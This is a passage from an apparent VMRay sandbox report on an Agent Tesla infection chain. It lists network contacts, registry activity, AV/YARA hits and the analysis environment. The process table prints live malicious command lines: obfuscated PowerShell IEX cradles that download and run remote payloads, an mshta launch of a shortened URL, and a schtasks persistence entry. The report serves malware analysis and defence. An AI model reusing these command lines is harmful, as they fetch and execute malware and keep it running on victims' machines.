67.199.248.14 www.bitly.com, bitly.com United States HTTP, TCP, DNS, HTTPS CLEAN
142.250.186.41 blogger.l.google.com, www.blogger.com, resources.blogblog.com United States TCP, DNS, HTTPS CLEAN
216.239.32.29 pki.goog United States HTTP, TCP, DNS CLEAN
142.250.185.237 accounts.google.com United States TCP, DNS, HTTPS CLEAN
142.250.74.202 fonts.googleapis.com United States TCP, DNS, HTTPS CLEAN
172.217.23.110 www.google-analytics.com, www-google-analytics.l.google.com United States TCP, DNS, HTTPS CLEAN
67.199.248.15 www.bitly.com, bitly.com United States DNS CLEAN
Mutex
Name Operations Parent Process Name Verdict
Local\!PrivacIE!SharedMemory!Mutex access mshta.exe CLEAN
Registry
Registry Key Operations Parent Process Name Verdict
HKEY_CURRENT_USER\Software\cookerr access, write mshta.exe SUSPICIOUS
HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 access, read mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu access, read mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background access, read mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CODEPAGE_INHERIT access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CODEPAGE_INHERIT access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561 access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_Cross_Domain_Redirect_Mitigation access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_Cross_Domain_Redirect_Mitigation access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\COM+Enabled access, read mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_Isolate_Named_Windows access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_Isolate_Named_Windows access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting access aspnet_compiler.exe, mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting\Default Impersonation Level access, read aspnet_compiler.exe, mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOAD_SHDOCLC_RESOURCES access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOAD_SHDOCLC_RESOURCES access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_IMG access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_IMG access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BINARY_CALLER_SERVICE_PROVIDER access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BINARY_CALLER_SERVICE_PROVIDER access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_BEHAVIORS_DRAW_REENTRANCY access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_BEHAVIORS_DRAW_REENTRANCY access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP access mshta.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_LEAK_CLEANUP_AT_SHUTDOWN_KB835183 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_LEAK_CLEANUP_AT_SHUTDOWN_KB835183 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging access powershell.exe CLEAN
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging access powershell.exe CLEAN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment access powershell.exe CLEAN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment\__PSLockdownPolicy access, read powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\InstallationType access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 access powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\HWRPortReuseOnSocketBind access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseHttpPipeliningAndBufferPooling access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseSafeSynchronousClose access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseSafeSynchronousClose access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictRfcInterimResponseHandling access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.AllowDangerousUnicodeDecompositions access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowDangerousUnicodeDecompositions access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.UseStrictIPv6AddressParsing access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictIPv6AddressParsing access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine access powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine\ApplicationBase access, read powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Uri.AllowAllUriEncodingExpansion access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowAllUriEncodingExpansion access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchUseStrongCrypto access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.SchSendAuxRecord access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchSendAuxRecord access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SystemDefaultTlsVersions access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.RequireCertificateEKUs access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\RequireCertificateEKUs access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_PERFORMANCE_DATA access powershell.exe CLEAN
HKEY_CURRENT_USER access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\LegacyWPADSupport access, read aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging access powershell.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE access aspnet_compiler.exe, powershell.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework access aspnet_compiler.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\DbgJITDebugLaunchSetting access, read aspnet_compiler.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\DbgManagedDebugger access, read aspnet_compiler.exe CLEAN
X-Ray Vision for Malware - www.vmray.com 56 / 60
DYNAMIC ANALYSIS REPORT#2111629
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings
access, create wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings
access, create wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\IgnoreUserSettings
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\Enabled
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\Enabled
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\LogSecuritySuccesses
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\LogSecuritySuccesses
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\TrustPolicy
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\UseWINSAFER
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\TrustPolicy
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\UseWINSAFER
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\Timeout
access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptHost\Settings\DisplayLogo
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\Timeout
access, read wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptHost\Settings\DisplayLogo
access, read wscript.exe CLEAN
HKEY_CLASSES_ROOT\.vbs access, read wscript.exe CLEAN
HKEY_CLASSES_ROOT\VBSFile\ScriptEngine access, read wscript.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting\Default Namespace
access, read aspnet_compiler.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\WMIDisableCOMSecurity
access, read aspnet_compiler.exe CLEAN
Process
Process Name Commandline Verdict
mshta.exe C:\Windows\SysWOW64\mshta.exe https://www.bitly.com/ddwddwwkfwdwoooi SUSPICIOUS
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /create /sc MINUTE /mo 80 /tn ""BlueStacksIUptad"" /F /tr ""\""MsHtA http://1230948%[email protected]/p/9.html\"" SUSPICIOUS
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hI`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Cre... ...-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt').GetResponse().GetResponseStream()).ReadToend()); SUSPICIOUS
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING ='(N`e`<^_^>t`.W`e'.Replace('<^_^>','w-Object Ne');$alosh='b... ...9a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X SUSPICIOUS
schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 80 /tn BlueStacksIUptad /F /tr"MsHtA http://1230948%[email protected]/p/9.html" SUSPICIOUS
mshta.exe C:\Windows\system32\MsHtA.EXE http://1230948%[email protected]/p/9.html SUSPICIOUS
aspnet_compiler.exe #cmd SUSPICIOUS
powerpnt.exe "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" CLEAN
outlook.exe "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding CLEAN
svchost.exe C:\Windows\system32\svchost.exe -k netsvcs CLEAN
wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding CLEAN
taskeng.exe taskeng.exe {4AF814F3-B5F2-456B-9FF3-B4FF2E8485C0}S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\kEecfMwgj:Interactive:LUA[1] CLEAN
aspnet_compiler.exe #Powershell CLEAN
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Chrome.vbs" CLEAN
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicyUnrestricted -File C:\Users\Public\run.ps1 CLEAN
schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I CLEAN
powershell.exe powershell.exe ((gp HKCU:\Software).cookerr)|IEX CLEAN
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\OneDrive.vbs" CLEAN
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicyUnrestricted -File C:\Users\Public\msi.ps1 CLEAN
YARA / AV
YARA (1)
Ruleset Name Rule Name Rule Description File Type File Name Classification Verdict
Malware AgentTesla_StringDecryption_v3 Agent Tesla v3 string decryption Memory Dump - Spyware 5/5
Antivirus (1)
File Type Threat Name File Name Verdict
Downloaded File VB:Trojan.Valyria.4205 - MALICIOUS
ENVIRONMENT
Virtual Machine Information
Name win7_64_sp1_en_mso2016
Description win7_64_sp1_en_mso2016
Architecture x86 64-bit
Operating System Windows 7
Kernel Version 6.1.7601.18741 (2e37f962-d699-492c-aaf3-f9f4e9770b1d)
Network Scheme Name Local Gateway
Network Config Name Local Gateway
Analyzer Information
Analyzer Version 4.2.2
Dynamic Engine Version 4.2.2 / 07/23/2021 03:44
Static Engine Version 4.2.2.0
Built-in AV Version AVCORE v2.2 Linux/x86_64 11.0.1.19 (March 15, 2021)
Built-in AV Database Update Release Date 2021-08-09 09:51:18+00:00
AV Exceptions Version 4.2.2.54 / 2021-07-23 03:00:10
VTI Ruleset Version 4.2.2.31 / 2021-07-19 18:52:40
YARA Built-in Ruleset Version 4.2.2.32
Link Detonation Heuristics Version -
Signature Trust Store Version 4.2.2.54 / 2021-07-23 03:00:10
Analysis Report Layout Version 10
Software Information
Adobe Acrobat Reader Version Not installed
Microsoft Office 2016
Microsoft Office Version 16.0.4266.1003
Internet Explorer Version 8.0.7601.17514
Chrome Version Not installed
Firefox Version Not installed
Flash Version Not installed
Java Version Not installed